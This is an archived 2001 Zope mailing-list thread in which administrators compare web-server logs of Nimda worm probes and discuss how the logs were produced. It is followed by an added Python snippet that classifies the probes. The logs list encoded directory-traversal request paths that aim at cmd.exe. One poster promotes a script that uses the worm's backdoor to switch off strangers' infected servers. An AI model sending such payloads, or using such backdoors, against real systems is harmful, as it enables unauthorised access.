Failure Report (9/19/2001 - 24 hour report)

Listing the top 30 files by the number of failed requests, sorted by the number of failed requests.

reqs: file
----: ----
1210: /scripts/..%255c../winnt/system32/cmd.exe
1210: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
1204: /scripts/..%5c../winnt/system32/cmd.exe
1204: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
615: /scripts/root.exe
615: /scripts/root.exe?/c+dir
611: /MSADC/root.exe
611: /MSADC/root.exe?/c+dir
610: /c/winnt/system32/cmd.exe
610: /c/winnt/system32/cmd.exe?/c+dir
609: /d/winnt/system32/cmd.exe
609: /d/winnt/system32/cmd.exe?/c+dir
608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
604: /scripts/..%c1%1c../winnt/system32/cmd.exe
604: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
603: /scripts/..%c0%af../winnt/system32/cmd.exe
603: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
603: /scripts/winnt/system32/cmd.exe
603: /scripts/winnt/system32/cmd.exe?/c+dir
602: /scripts/..%c1%9c../winnt/system32/cmd.exe
602: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
598: /scripts/..%252f../winnt/system32/cmd.exe
598: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir

That is a lot of requests! Glad Zope could handle it.

BZ
On 20 Sep 2001 18:28:43 -0000, you wrote:
That is a lot of requests! Glad Zope could handle it.
You can "help" your infected neighbours by remotely turning their infected servers off! see http://pc.xs4all.nl/default.ida
(it is a Perl script that uses the same backdoor as the virus itself. I've not yet installed perl in Zope, but am working on it ";-)

--
__________________________________________________
"Nothing is as subjective as reality"
Reinoud van Leeuwen reinoud@xs4all.nl
http://www.xs4all.nl/~reinoud
-> when replying to a mailinglist mail, please do <-
-> *NOT* cc: me as well. If I read the list I will <-
-> receive the reply as well! <-
__________________________________________________
How do you get that log from Zope?

On Thu, Sep 20, 2001 at 08:30:33PM +0000, Reinoud van Leeuwen wrote:
You can "help" your infected neighbours by remotely turning their infected servers off! see http://pc.xs4all.nl/default.ida
(it is a Perl script that uses the same backdoor as the virus itself. I've not yet installed perl in Zope, but am working on it ";-)
_______________________________________________ Zope maillist - Zope@zope.org http://lists.zope.org/mailman/listinfo/zope ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope-dev )
-- Michael Montagne montagne@boora.com http://www.boora.com
From Z2.log and Analog (http://www.analog.cx)
BZ

At 2:08 PM -0700 9/20/01, Michael Montagne wrote:
How do you get that log from Zope?
Re: [Zope] Zope 1 : NIMDA 0

Does this involve ZEO and Apache? All of a sudden our Apache server crashed. I had mod_rewrite there. Then when a new Apache server with more capacity went back up, ZEO clients slowed down. What happened? Thanks.

----- Original Message -----
From: BZ
To: Michael Montagne ; zope@zope.org
Sent: Friday, September 21, 2001 7:18 AM
Subject: Re: [Zope] Zope 1 : NIMDA 0

From Z2.log and Analog (http://www.analog.cx)
BZ

At 2:08 PM -0700 9/20/01, Michael Montagne wrote:
How do you get that log from Zope?
From: reinoud@xs4all.nl (Reinoud van Leeuwen)
You can "help" your infected neighbours by remotely turning their infected servers off! see http://pc.xs4all.nl/default.ida
(it is a Perl script that uses the same backdoor as the virus itself. I've not yet installed perl in Zope, but am working on it ";-)
I'm not seeing a request for that as part of the worm attack. It does a pattern of 16 requests, here's the log:

9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:root.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:MSADC:root.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:c:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:d:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%5c..:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:_vti_bin:..%5c..:..%5c..:..%5c..:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:_mem_bin:..%5c..:..%5c..:..%5c..:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:msadc:..%5c..:..%5c..:..%5c:..%c1%1c..:..%c1%1c..:..%c1%1c..:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%c1%1c..:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%c0%2f..:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%c0%af..:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%c1%9c..:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%5c..:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%5c..:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%5c..:winnt:system32:cmd.exe File/folder not found
9:14 AM 9/18/01 216.254.35.211 HTTP get failed :pub:scripts:..%2f..:winnt:system32:cmd.exe File/folder not found
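An added example, not part of the thread and not Zope's or Analog's code: one way to group the probes in the two logs above by the encoding they use, by decoding each path until it stops changing and then tagging it. The function names, the tag names and the lax-decoder model are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

TARGET = re.compile(r"/(?:cmd|root)\.exe$")
# A 0xC0/0xC1 lead byte is never valid UTF-8; match it with the byte after it.
OVERLONG = re.compile(rb"([\xc0\xc1])(.)", re.S)

def normalise(path, max_rounds=4):
    """Percent-decode until stable, fold overlong bytes, map '\\' and ':' to '/'."""
    raw = path.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    # Assumption: model a lax decoder that keeps only the payload bits, so
    # %c0%af and %c0%2f fold to '/', %c1%9c and %c1%1c fold to '\'.
    raw = OVERLONG.sub(
        lambda m: bytes([((m[1][0] & 0x1F) << 6) | (m[2][0] & 0x3F)]), raw)
    return raw.decode("latin-1").replace("\\", "/").replace(":", "/").lower()

def classify(request):
    """Return (normalised path, tags) for a cmd.exe/root.exe probe, else None."""
    path = request.split("?", 1)[0]
    norm = normalise(path)
    if not TARGET.search(norm):
        return None
    tags = []
    if "%25" in path:
        tags.append("double-encoded")
    if re.search(r"%c[01]%[0-9a-f]{2}", path, re.I):
        tags.append("overlong-utf8")
    if "/../" in norm:
        tags.append("traversal")
    return norm, tags or ["direct"]

def summarise(report_lines):
    """Sum the counts of 'count: path' report rows per tag."""
    totals = {}
    for line in report_lines:
        count, _, request = line.strip().partition(": ")
        hit = classify(request) if count.isdigit() else None
        for tag in (hit[1] if hit else []):
            totals[tag] = totals.get(tag, 0) + int(count)
    return totals

# Constructed sample rows in the report's "reqs: file" layout.
SAMPLE = ["1210: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
          " 615: /scripts/root.exe", "  12: /index_html"]
```

Every traversal variant in both logs normalises to the same `/../../winnt/system32/cmd.exe` suffix, so a filter that matches on the normalised path catches all of them with one rule.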
participants (5)
- BZ
- Fritz Mesedilla
- marc lindahl
- Michael Montagne
- reinoud@xs4all.nl